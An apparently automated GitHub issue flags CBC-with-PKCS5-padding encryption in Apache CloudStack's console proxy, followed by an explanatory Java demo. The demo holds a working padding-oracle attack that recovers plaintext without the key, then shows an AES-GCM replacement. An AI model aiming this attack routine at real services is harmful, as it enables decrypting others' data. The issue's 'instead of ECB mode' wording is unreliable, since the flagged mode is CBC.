Mahir92 opened a new issue #4694: URL: https://github.com/apache/cloudstack/issues/4694
In file https://github.com/apache/cloudstack/blob/0f3f2a09370a18301db28ec3d28efe746b6437c9/services/console-proxy/server/src/main/java/com/cloud/consoleproxy/ConsoleProxyPasswordBasedEncryptor.java (at Line 61), insecure "AES/CBC/PKCS5Padding" was used for encryption.

Security Impact: Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.

Useful Resources: https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-4432

Solution we suggest: Use GCM mode instead of ECB mode.

Please share with us your opinions/comments if there are any: Is the bug report helpful?

----------------------------------------------------------------
This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. For queries about this service, please contact Infrastructure at: us...@infra.apache.org
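The following is an added, self-contained Java example written for this page; it is not CloudStack's code and does not reproduce ConsoleProxyPasswordBasedEncryptor. It shows concretely why the report matters: a decryptor built on "AES/CBC/PKCS5Padding" that merely reveals whether unpadding succeeded (here, by catching BadPaddingException) is enough for an attacker holding only the ciphertext to recover a full plaintext block with at most 256 queries per byte, and it shows the suggested replacement, "AES/GCM/NoPadding" with a fresh 96-bit nonce, where any modification is rejected with AEADBadTagException before a single plaintext byte is released. The key, the message and all method names (cbcEncrypt, cbcPaddingValid, recoverBlock, gcmEncrypt, gcmDecrypt) are constructed for the demonstration.

```java
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Arrays;
import javax.crypto.AEADBadTagException;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class CbcPaddingOracleDemo {
    private static final SecureRandom RNG = new SecureRandom();
    private static final byte[] KEY = new byte[16];   // constructed demo key, random per run
    static { RNG.nextBytes(KEY); }
    static int oracleQueries = 0;

    // Weak construction: CBC + PKCS5 padding, output = IV || ciphertext.
    static byte[] cbcEncrypt(byte[] plaintext) throws Exception {
        byte[] iv = new byte[16];
        RNG.nextBytes(iv);
        Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY, "AES"), new IvParameterSpec(iv));
        byte[] ct = c.doFinal(plaintext);
        byte[] out = Arrays.copyOf(iv, 16 + ct.length);
        System.arraycopy(ct, 0, out, 16, ct.length);
        return out;
    }

    // The padding oracle: the caller learns only whether unpadding succeeded. Any
    // observable difference (exception type, error message, timing) is equivalent.
    static boolean cbcPaddingValid(byte[] ivAndCt) throws Exception {
        oracleQueries++;
        Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
        c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(KEY, "AES"),
               new IvParameterSpec(Arrays.copyOfRange(ivAndCt, 0, 16)));
        try { c.doFinal(ivAndCt, 16, ivAndCt.length - 16); return true; }
        catch (BadPaddingException e) { return false; }
    }

    // Classic padding-oracle attack: recover plaintext block `blockIndex` (IV is block 0)
    // without the key, by forging the preceding block so the decrypted tail reads as valid padding.
    static byte[] recoverBlock(byte[] ivAndCt, int blockIndex) throws Exception {
        byte[] prev = Arrays.copyOfRange(ivAndCt, (blockIndex - 1) * 16, blockIndex * 16);
        byte[] target = Arrays.copyOfRange(ivAndCt, blockIndex * 16, (blockIndex + 1) * 16);
        byte[] dec = new byte[16];                     // D_K(target), found from the right
        for (int pos = 15; pos >= 0; pos--) {
            int pad = 16 - pos;
            byte[] forged = new byte[32];              // forged IV || target block
            System.arraycopy(target, 0, forged, 16, 16);
            for (int k = pos + 1; k < 16; k++) forged[k] = (byte) (dec[k] ^ pad);
            for (int g = 0; g < 256; g++) {
                forged[pos] = (byte) g;
                if (!cbcPaddingValid(forged)) continue;
                if (pos == 15) {                       // rule out an accidental 0x02 0x02 (etc.) match
                    forged[14] ^= 1;
                    boolean still = cbcPaddingValid(forged);
                    forged[14] ^= 1;
                    if (!still) continue;
                }
                dec[pos] = (byte) (g ^ pad);
                break;
            }
        }
        byte[] plain = new byte[16];
        for (int i = 0; i < 16; i++) plain[i] = (byte) (dec[i] ^ prev[i]);
        return plain;
    }

    // Suggested replacement: AES-GCM, 96-bit random nonce, 128-bit tag, output = nonce || ct || tag.
    static byte[] gcmEncrypt(byte[] plaintext, byte[] aad) throws Exception {
        byte[] nonce = new byte[12];
        RNG.nextBytes(nonce);                          // must never repeat under the same key
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY, "AES"), new GCMParameterSpec(128, nonce));
        c.updateAAD(aad);
        byte[] ct = c.doFinal(plaintext);
        byte[] out = Arrays.copyOf(nonce, 12 + ct.length);
        System.arraycopy(ct, 0, out, 12, ct.length);
        return out;
    }

    static byte[] gcmDecrypt(byte[] nonceAndCt, byte[] aad) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(KEY, "AES"),
               new GCMParameterSpec(128, Arrays.copyOfRange(nonceAndCt, 0, 12)));
        c.updateAAD(aad);
        return c.doFinal(nonceAndCt, 12, nonceAndCt.length - 12); // AEADBadTagException on any tamper
    }

    public static void main(String[] args) throws Exception {
        byte[] msg = "console-session-token:example!!".getBytes(StandardCharsets.UTF_8); // constructed
        byte[] aad = "consoleproxy-v1".getBytes(StandardCharsets.UTF_8);

        byte[] cbc = cbcEncrypt(msg);
        byte[] block1 = recoverBlock(cbc, 1);
        System.out.println("CBC: recovered block 1 = \"" + new String(block1, StandardCharsets.UTF_8)
                           + "\" with " + oracleQueries + " oracle queries and no key");

        byte[] gcm = gcmEncrypt(msg, aad);
        System.out.println("GCM: decrypts to \"" + new String(gcmDecrypt(gcm, aad), StandardCharsets.UTF_8) + "\"");
        gcm[20] ^= 1;                                   // flip one ciphertext bit
        try { gcmDecrypt(gcm, aad); }
        catch (AEADBadTagException e) { System.out.println("GCM: tampered ciphertext rejected, nothing leaked"); }
    }
}
```

Two caveats when applying the suggested fix. GCM's security collapses if a nonce is ever reused under the same key (authentication forgery and plaintext XOR leakage), so the nonce must be generated with SecureRandom per message or taken from a counter, and the key must be rotated well before 2^32 random-nonce encryptions. Switching the cipher mode also does not change the strength of the key itself; if the key is derived from a short configured password, a brute-force attack on that password remains possible regardless of the mode.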